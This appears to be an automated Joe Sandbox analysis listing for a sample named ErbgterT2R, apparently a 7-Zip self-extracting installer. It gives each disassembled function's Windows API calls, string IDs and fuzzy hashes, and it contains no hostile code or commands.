                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 2693764856-0
                                                                                            • Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                                                            • Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
                                                                                            • Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                                                            • Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65
                                                                                            Function 0040695E Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDC.USER32(?), ref: 0040696E
                                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0040698A
                                                                                            • GetSystemMetrics.USER32(0000003D), ref: 00406993
                                                                                            • GetSystemMetrics.USER32(0000003E), ref: 0040699B
                                                                                            • SelectObject.GDI32(?,?), ref: 004069B8
                                                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
                                                                                            • SelectObject.GDI32(?,?), ref: 004069F9
                                                                                            • ReleaseDC.USER32(?,?), ref: 00406A08
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                                            • String ID:
                                                                                            • API String ID: 2466489532-0
                                                                                            • Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                                                            • Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
                                                                                            • Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                                                            • Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40
                                                                                            Function 00407B33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                                                                            • GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                                            • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                                            • wsprintfW.USER32 ref: 00407BBB
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                                            • String ID: %d%%
                                                                                            • API String ID: 3753976982-1518462796
                                                                                            • Opcode ID: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                                                                            • Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
                                                                                            • Opcode Fuzzy Hash: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                                                                            • Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59
                                                                                            Function 0040408B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4
                                                                                              • Part of subcall function 00401A85: CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                                              • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$CharUpper$lstrlen
                                                                                            • String ID: hAA
                                                                                            • API String ID: 2587799592-1362906312
                                                                                            • Opcode ID: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                                                                            • Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
                                                                                            • Opcode Fuzzy Hash: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                                                                            • Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658
                                                                                            Function 00404CBC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8
                                                                                              • Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                                                              • Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                                                              • Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                                                              • Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                                            • String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                            • API String ID: 4038993085-2279431206
                                                                                            • Opcode ID: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                                                                            • Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
                                                                                            • Opcode Fuzzy Hash: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                                                                            • Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98
                                                                                            Function 0040755F Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EndDialog.USER32(?,00000000), ref: 00407579
                                                                                            • KillTimer.USER32(?,00000001), ref: 0040758A
                                                                                            • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
                                                                                            • SuspendThread.KERNEL32(0000029C), ref: 004075CD
                                                                                            • ResumeThread.KERNEL32(0000029C), ref: 004075EA
                                                                                            • EndDialog.USER32(?,00000000), ref: 0040760C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: DialogThreadTimer$KillResumeSuspend
                                                                                            • String ID:
                                                                                            • API String ID: 4151135813-0
                                                                                            • Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                                                            • Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
                                                                                            • Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                                                            • Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D
                                                                                            Function 00404E3F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                                                              • Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6
                                                                                            • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                                                            • wsprintfA.USER32 ref: 00404EBC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$wsprintf
                                                                                            • String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                            • API String ID: 2704270482-1550708412
                                                                                            • Opcode ID: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                                                            • Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
                                                                                            • Opcode Fuzzy Hash: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                                                            • Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799
                                                                                            Function 00403880 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID: %%T/$%%T\
                                                                                            • API String ID: 613200358-2679640699
                                                                                            • Opcode ID: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                                                            • Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
                                                                                            • Opcode Fuzzy Hash: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                                                            • Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98
                                                                                            Function 0040393B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID: %%S/$%%S\
                                                                                            • API String ID: 613200358-358529586
                                                                                            • Opcode ID: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                                                            • Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
                                                                                            • Opcode Fuzzy Hash: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                                                            • Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98
                                                                                            Function 004039F6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID: %%M/$%%M\
                                                                                            • API String ID: 613200358-4143866494
                                                                                            • Opcode ID: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                                            • Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
                                                                                            • Opcode Fuzzy Hash: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                                            • Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58
                                                                                            Function 0040E456 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionThrow
                                                                                            • String ID: $JA$4JA$DJA$TJA$hJA$xJA
                                                                                            • API String ID: 432778473-803145960
                                                                                            • Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                                            • Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
                                                                                            • Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                                            • Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C
                                                                                            Function 0040C0DC Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 243COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D
                                                                                              • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                                              • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                                              • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$??3@$memmove
                                                                                            • String ID: IA$IA$IA
                                                                                            • API String ID: 4294387087-924693538
                                                                                            • Opcode ID: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                                                                            • Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
                                                                                            • Opcode Fuzzy Hash: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                                                                            • Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54
                                                                                            Function 0040E811 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
                                                                                            • ??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
                                                                                            • memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
